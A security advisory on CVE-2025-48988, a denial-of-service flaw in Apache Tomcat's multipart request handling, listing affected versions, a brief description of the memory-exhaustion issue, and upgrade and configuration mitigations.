Overview
Apache Tomcat is an open-source web server and servlet container developed by the Apache Software Foundation. It implements several Java Enterprise Edition (Java EE) specifications including Java Servlet, JavaServer Pages (JSP), and WebSocket, allowing it to run Java web applications. Tomcat is widely used in both development and production environments due to its lightweight nature, ease of configuration, and compatibility with various Java applications.
A Denial of Service (DoS) vulnerability (CVE-2025-48988) has been identified in Apache Tomcat’s handling of multipart requests which allows attackers to exhaust server memory in vulnerable applications.
The Open Web Application Security Project (OWASP) explains that Denial of Service (DoS) attacks are focused on making a resource (site, application, server) unavailable for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical, or resources handling vulnerabilities, among others. If a service receives a very large number of requests, it may cease to be available to legitimate users. In the same way, a service may stop if a programming vulnerability is exploited, or the way the service handles resources it uses.
This issue affects multiple versions of Apache Tomcat below 11.0.8.
Details
Module Info
- Product: Apache Tomcat
- Affected packages: tomcat-embed-core, tomcat-catalina
- Affected versions: >=9.0.0.M1 <9.0.106, >=10.1.0-M1 <10.1.42, >=11.0.0-M1 <11.0.8
- GitHub repository: https://github.com/apache/tomcat
- Published packages:
- Package manager: Maven
- Fixed in: NES 8.5.101, 9.0.106, 10.1.42, and 11.0.8
Vulnerability Info
An attacker can exploit a vulnerable version of Tomcat by making a multipart request with many parts. Since uploaded parts also include headers which must be retained, processing multipart requests can result in significantly more memory usage, rendering the server unresponsive.
Mitigation
Only recent versions of Apache Tomcat are community-supported. The community support version will not receive any updates to address this issue. For more information, see here.
Users of the affected components should apply one of the following mitigations:
- Upgrade to a patched version of Apache Tomcat and configure maxPartCount (default 10 parts) and maxPartHeaderSize (default 512 bytes) on the Connector object.
Leverage a commercial support partner like HeroDevs for post-EOL security support.
Credit
- TERASOLUNA Framework Security Team of NTT DATA Group Corporation (finder)